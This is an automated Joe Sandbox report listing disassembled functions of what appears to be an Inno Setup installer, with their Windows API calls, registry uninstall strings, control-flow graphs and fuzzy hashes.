                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID:
                                                                            • API String ID: 2574300362-0
                                                                            • Opcode ID: e1f9654b16739f7afd9434fe722f8049f548f167a04ca6919c39ec6c1a6f3416
                                                                            • Instruction ID: 0540f09e741ba6bdaccbcd33a6618944dfbf5ea3d39d596ba1fc0c584366e1b5
                                                                            • Opcode Fuzzy Hash: e1f9654b16739f7afd9434fe722f8049f548f167a04ca6919c39ec6c1a6f3416
                                                                            • Instruction Fuzzy Hash: 87514574E04105AFDB00EF95C481AAEB7F9EF44315F1081BBE814BB391DB389E058B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004513E4 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00451447,?,?,-00000001,00000000), ref: 00451421
                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00451447,?,?,-00000001,00000000), ref: 00451429
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileFindFirstLast
                                                                            • String ID:
                                                                            • API String ID: 873889042-0
                                                                            • Opcode ID: 9098511829d4e670addc214c55e43265b4f5de8ad82b820fa4573d5b106649ad
                                                                            • Instruction ID: e37cade2724d1815d1fa35268cc527e6c5f68d3fdc0659cff19e79a06527a77b
                                                                            • Opcode Fuzzy Hash: 9098511829d4e670addc214c55e43265b4f5de8ad82b820fa4573d5b106649ad
                                                                            • Instruction Fuzzy Hash: AFF04931A00204AB8B10EFA69C4149EF7ECDB4672676086BBFC14E3692DA784D048558
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004084D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                            • Instruction ID: 1ce02aaae6ec4ade8b295bae84213e8e13784b7c216e354617812bc232f4da8b
                                                                            • Opcode Fuzzy Hash: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                            • Instruction Fuzzy Hash: 59E0D87170021467D711E95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE4046ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00423AF4 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,004240C1,?,00000000,004240CC), ref: 00423B1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: cc880d6ce53abf1e7d27737915fc5f31ec95f8b5a45794faa8616ac4cf8ccc5f
                                                                            • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                            • Opcode Fuzzy Hash: cc880d6ce53abf1e7d27737915fc5f31ec95f8b5a45794faa8616ac4cf8ccc5f
                                                                            • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00453D04 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: cdb4bec123f1825443ad5cc623391d8cf1be7f4fb66e8da3f94aff517a088b8d
                                                                            • Instruction ID: 0cfc6298fdd12068752ce7e5f45c2d53baaa1050ce66cc5593b8e4691a5d7c37
                                                                            • Opcode Fuzzy Hash: cdb4bec123f1825443ad5cc623391d8cf1be7f4fb66e8da3f94aff517a088b8d
                                                                            • Instruction Fuzzy Hash: 69D0C2B120420053C300AE68DC8269635AC8B84356F10483E7C85CB3C3EA7CDF4D566A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042ED54 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042ED70
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: 0d99781ba3b74d129cf7fe284f2fb874a2833baad2c3ee0b8c17a51b42a1def1
                                                                            • Instruction ID: 792271a71424278b40c344544890263380edecd1d6d7572d4222c7646c861560
                                                                            • Opcode Fuzzy Hash: 0d99781ba3b74d129cf7fe284f2fb874a2833baad2c3ee0b8c17a51b42a1def1
                                                                            • Instruction Fuzzy Hash: 0FD05E7121010DAB8B00DE99E880C6B33AC9B88740B608805F518C7205C634EC1087A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046AA8C Relevance: 68.7, APIs: 1, Strings: 38, Instructions: 412registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 409 46aa8c-46aabc 410 46aac7 409->410 411 46aabe-46aac5 409->411 412 46aace-46ab06 call 403634 call 403738 call 42dcf8 410->412 411->412 419 46ab21-46ab4a call 403738 call 42dc1c 412->419 420 46ab08-46ab1c call 403738 call 42dcf8 412->420 428 46ab4c-46ab55 call 46a75c 419->428 429 46ab5a-46ab83 call 46a878 419->429 420->419 428->429 433 46ab95-46ab98 call 403400 429->433 434 46ab85-46ab93 call 403494 429->434 438 46ab9d-46abe8 call 46a878 call 42c36c call 46a8c0 call 46a878 433->438 434->438 447 46abfe-46ac1f call 453d04 call 46a878 438->447 448 46abea-46abfd call 46a8e8 438->448 455 46ac75-46ac7c 447->455 456 46ac21-46ac74 call 46a878 call 4746ec call 46a878 call 4746ec call 46a878 447->456 448->447 457 46ac7e-46acbb call 4746ec call 46a878 call 4746ec call 46a878 455->457 458 46acbc-46acc3 455->458 456->455 457->458 462 46ad04-46ad08 458->462 463 46acc5-46ad03 call 46a878 * 3 458->463 465 46ad17-46ad20 call 403494 462->465 466 46ad0a-46ad15 call 476f14 462->466 463->462 476 46ad25-46aef2 call 403778 call 46a878 call 476f14 call 46a8c0 call 403494 call 40357c * 2 call 46a878 call 403494 call 40357c * 2 call 46a878 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 465->476 466->476 553 46aef4-46af06 call 46a878 476->553 554 46af08-46af16 call 46a8e8 476->554 559 46af1c-46af65 call 46a8e8 call 46a91c call 46a878 call 476f14 call 46a980 553->559 558 46af1b 554->558 558->559 570 46af67-46af85 call 46a8e8 * 2 559->570 571 46af8b-46af92 559->571 579 46af8a 570->579 573 46af94-46afca call 48ebc0 571->573 574 46afec-46b002 RegCloseKey 571->574 573->574 579->571
                                                                            APIs
                                                                              • Part of subcall function 0046A878: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,004950AC,?,0046AB7B,?,00000000,0046B003,?,_is1), ref: 0046A89B
                                                                            • RegCloseKey.ADVAPI32(?,0046B00A,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046B055,?,?,00000001,004950AC), ref: 0046AFFD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue
                                                                            • String ID: " /SILENT$5.3.4 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                            • API String ID: 3132538880-4027905794
                                                                            • Opcode ID: 9a8eb871790f0b22bcff3233a218b1705323e430392313ecfac733ee4545f969
                                                                            • Instruction ID: bcc948474739f7d4ff28eebc8c8e5d3f87406a7e72996d7d4e0226daa9b19a94
                                                                            • Opcode Fuzzy Hash: 9a8eb871790f0b22bcff3233a218b1705323e430392313ecfac733ee4545f969
                                                                            • Instruction Fuzzy Hash: 70F15870A005099BCB04EB55D8519AEB7B9EB44304F60C07BE811AB395EB78BD46CF5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0048C62C Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 972 48c62c-48c660 call 403684 975 48c662-48c671 call 446830 Sleep 972->975 976 48c676-48c683 call 403684 972->976 981 48cb06-48cb20 call 403420 975->981 982 48c6b2-48c6bf call 403684 976->982 983 48c685-48c6a8 call 44688c call 403738 FindWindowA call 446b0c 976->983 990 48c6ee-48c6fb call 403684 982->990 991 48c6c1-48c6e9 call 44688c call 403738 FindWindowA call 446b0c 982->991 999 48c6ad 983->999 1001 48c6fd-48c73f call 446830 * 4 SendMessageA call 446b0c 990->1001 1002 48c744-48c751 call 403684 990->1002 991->981 999->981 1001->981 1011 48c7a0-48c7ad call 403684 1002->1011 1012 48c753-48c79b call 446830 * 4 PostMessageA call 446964 1002->1012 1020 48c7fc-48c809 call 403684 1011->1020 1021 48c7af-48c7f7 call 446830 * 4 SendNotifyMessageA call 446964 1011->1021 1012->981 1033 48c80b-48c831 call 44688c call 403738 RegisterClipboardFormatA call 446b0c 1020->1033 1034 48c836-48c843 call 403684 1020->1034 1021->981 1033->981 1046 48c884-48c891 call 403684 1034->1046 1047 48c845-48c87f call 446830 * 3 SendMessageA call 446b0c 1034->1047 1061 48c8d8-48c8e5 call 403684 1046->1061 1062 48c893-48c8d3 call 446830 * 3 PostMessageA call 446964 1046->1062 1047->981 1073 48c92c-48c939 call 403684 1061->1073 1074 48c8e7-48c927 call 446830 * 3 SendNotifyMessageA call 446964 1061->1074 1062->981 1084 48c93b-48c959 call 44688c call 42e1f0 1073->1084 1085 48c98e-48c99b call 403684 1073->1085 1074->981 1105 48c96b-48c979 GetLastError call 446b0c 1084->1105 1106 48c95b-48c969 call 446b0c 1084->1106 1096 48c99d-48c9c9 call 44688c call 403738 call 446830 GetProcAddress 1085->1096 1097 48ca15-48ca22 call 403684 1085->1097 1130 48c9cb-48ca00 call 446830 * 2 call 446b0c call 446964 1096->1130 1131 48ca05-48ca10 call 446964 1096->1131 1110 48ca4a-48ca57 call 403684 1097->1110 1111 48ca24-48ca45 call 446830 FreeLibrary call 446964 1097->1111 1113 48c97e-48c989 call 446b0c 1105->1113 1106->1113 1124 48ca59-48ca77 call 44688c call 403738 CreateMutexA 1110->1124 1125 48ca7c-48ca89 call 403684 1110->1125 1111->981 1113->981 1124->981 1138 48ca8b-48cabd call 4869a8 call 403574 call 403738 OemToCharBuffA call 4869c0 1125->1138 1139 48cabf-48cacc call 403684 1125->1139 1130->981 1131->981 1138->981 1149 48cace-48cb00 call 4869a8 call 403574 call 403738 CharToOemBuffA call 4869c0 1139->1149 1150 48cb02 1139->1150 1149->981 1150->981
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,00000000,0048CB21,?,?,?,?,00000000,00000000,00000000), ref: 0048C66C
                                                                            • FindWindowA.USER32(00000000,00000000), ref: 0048C69D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FindSleepWindow
                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                            • API String ID: 3078808852-3310373309
                                                                            • Opcode ID: 00e72b43fdd863d5ba5dcc0766ec439f54cea458937b4516d34acaa2a5549163
                                                                            • Instruction ID: f524c342f64002353724253178373006bfdacafd8b11f716a45f6a977dbd9a74
                                                                            • Opcode Fuzzy Hash: 00e72b43fdd863d5ba5dcc0766ec439f54cea458937b4516d34acaa2a5549163
                                                                            • Instruction Fuzzy Hash: 70C18560B0061027D714FB7E9C8261E66999F95704B11DD3FB446EB78ACE3DEC05836E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047DC90 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1477 47dc90-47dcb5 GetModuleHandleA GetProcAddress 1478 47dcb7-47dccd GetNativeSystemInfo GetProcAddress 1477->1478 1479 47dd1c-47dd21 GetSystemInfo 1477->1479 1480 47dd26-47dd2f 1478->1480 1481 47dccf-47dcda GetCurrentProcess 1478->1481 1479->1480 1482 47dd31-47dd35 1480->1482 1483 47dd3f-47dd46 1480->1483 1481->1480 1488 47dcdc-47dce0 1481->1488 1484 47dd37-47dd3b 1482->1484 1485 47dd48-47dd4f 1482->1485 1486 47dd61-47dd66 1483->1486 1489 47dd51-47dd58 1484->1489 1490 47dd3d-47dd5a 1484->1490 1485->1486 1488->1480 1491 47dce2-47dce9 call 4510a0 1488->1491 1489->1486 1490->1486 1491->1480 1495 47dceb-47dcf8 GetProcAddress 1491->1495 1495->1480 1496 47dcfa-47dd11 GetModuleHandleA GetProcAddress 1495->1496 1496->1480 1497 47dd13-47dd1a 1496->1497 1497->1480
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0047DCA1
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0047DCAE
                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047DCBC
                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0047DCC4
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0047DCD0
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0047DCF1
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 0047DD04
                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0047DD0A
                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047DD21
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                            • API String ID: 2230631259-2623177817
                                                                            • Opcode ID: cd7d2839bf33e36d33ab18a2ace6ff88ba8499abbd063b6382b2a6e7979d4eda
                                                                            • Instruction ID: 9223080a01aab665d55f2b56f17608545a072cc335287f1292a6e5765a842dfc
                                                                            • Opcode Fuzzy Hash: cd7d2839bf33e36d33ab18a2ace6ff88ba8499abbd063b6382b2a6e7979d4eda
                                                                            • Instruction Fuzzy Hash: AD11E241C2574094EA31B7B58E4ABFB2678CF12758F18C43B784C662C3D67CD8448A6F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004651A8 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1498 4651a8-4651e0 call 476f14 1501 4651e6-4651f6 call 473d54 1498->1501 1502 4653c2-4653dc call 403420 1498->1502 1507 4651fb-465240 call 40785c call 403738 call 42dc54 1501->1507 1513 465245-465247 1507->1513 1514 46524d-465262 1513->1514 1515 4653b8-4653bc 1513->1515 1516 465277-46527e 1514->1516 1517 465264-465272 call 42db84 1514->1517 1515->1502 1515->1507 1519 465280-4652a2 call 42db84 call 42db9c 1516->1519 1520 4652ab-4652b2 1516->1520 1517->1516 1519->1520 1538 4652a4 1519->1538 1522 4652b4-4652d9 call 42db84 * 2 1520->1522 1523 46530b-465312 1520->1523 1545 4652db-4652e4 call 4747e0 1522->1545 1546 4652e9-4652fb call 42db84 1522->1546 1525 465314-465326 call 42db84 1523->1525 1526 465358-46535f 1523->1526 1539 465336-465348 call 42db84 1525->1539 1540 465328-465331 call 4747e0 1525->1540 1528 465361-465395 call 42db84 * 3 1526->1528 1529 46539a-4653b0 RegCloseKey 1526->1529 1528->1529 1538->1520 1539->1526 1553 46534a-465353 call 4747e0 1539->1553 1540->1539 1545->1546 1546->1523 1555 4652fd-465306 call 4747e0 1546->1555 1553->1526 1555->1523
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,004653C2,?,?,00000001,00000000,00000000,004653DD,?,00000000,00000000,?), ref: 004653AB
                                                                            Strings
                                                                            • Inno Setup: No Icons, xrefs: 00465293
                                                                            • %s\%s_is1, xrefs: 00465225
                                                                            • Inno Setup: Deselected Tasks, xrefs: 00465339
                                                                            • Inno Setup: Selected Tasks, xrefs: 00465317
                                                                            • Inno Setup: Deselected Components, xrefs: 004652EC
                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00465207
                                                                            • Inno Setup: User Info: Name, xrefs: 00465367
                                                                            • Inno Setup: User Info: Organization, xrefs: 0046537A
                                                                            • Inno Setup: App Path, xrefs: 0046526A
                                                                            • Inno Setup: Icon Group, xrefs: 00465286
                                                                            • Inno Setup: Setup Type, xrefs: 004652BA
                                                                            • Inno Setup: Selected Components, xrefs: 004652CA
                                                                            • Inno Setup: User Info: Serial, xrefs: 0046538D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                            • API String ID: 47109696-1093091907
                                                                            • Opcode ID: 9ce9a5df1975e756b432f281553e90eeeeefc017c1f178ede9342908355fa115
                                                                            • Instruction ID: 4ab213a2d8ea7f563b4f24483654b6d3db0bb1d5b93a3c7cd1a46aaae94220a2
                                                                            • Opcode Fuzzy Hash: 9ce9a5df1975e756b432f281553e90eeeeefc017c1f178ede9342908355fa115
                                                                            • Instruction Fuzzy Hash: 5251D630A00A449BCB11DB65D9517DEBBF5EF44344FA084BAE844A7392E778AF45CB09
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004237E4 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1716 4237e4-4237ee 1717 423917-42391b 1716->1717 1718 4237f4-423816 call 41f334 GetClassInfoA 1716->1718 1721 423847-423850 GetSystemMetrics 1718->1721 1722 423818-42382f RegisterClassA 1718->1722 1724 423852 1721->1724 1725 423855-42385f GetSystemMetrics 1721->1725 1722->1721 1723 423831-423842 call 408c24 call 40311c 1722->1723 1723->1721 1724->1725 1727 423861 1725->1727 1728 423864-4238c0 call 403738 call 406300 call 403400 call 4235bc SetWindowLongA 1725->1728 1727->1728 1739 4238c2-4238d5 call 4240e8 SendMessageA 1728->1739 1740 4238da-423908 GetSystemMenu DeleteMenu * 2 1728->1740 1739->1740 1740->1717 1742 42390a-423912 DeleteMenu 1740->1742 1742->1717
                                                                            APIs
                                                                              • Part of subcall function 0041F334: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                            • GetClassInfoA.USER32(00400000,004235EC), ref: 0042380F
                                                                            • RegisterClassA.USER32(00493630), ref: 00423827
                                                                            • GetSystemMetrics.USER32(00000000), ref: 00423849
                                                                            • GetSystemMetrics.USER32(00000001), ref: 00423858
                                                                            • SetWindowLongA.USER32(004105C0,000000FC,004235FC), ref: 004238B4
                                                                            • SendMessageA.USER32(004105C0,00000080,00000001,00000000), ref: 004238D5
                                                                            • GetSystemMenu.USER32(004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238E0
                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238EF
                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 004238FC
                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000), ref: 00423912
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                            • String ID: 5B
                                                                            • API String ID: 183575631-3738334870
                                                                            • Opcode ID: 2525fb3c05810e8562c46c69867c8ead6d06b13db06e753dcd3e83bb75084637
                                                                            • Instruction ID: 904541913dac979c95981ef11fb7d46e22315ee65c5a1a9273e4e0c77d2e9a1f
                                                                            • Opcode Fuzzy Hash: 2525fb3c05810e8562c46c69867c8ead6d06b13db06e753dcd3e83bb75084637
                                                                            • Instruction Fuzzy Hash: 073161B17402107AEB20AF65DC82F6B36989715709F10017BBA41AF2D7C67DED01876C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

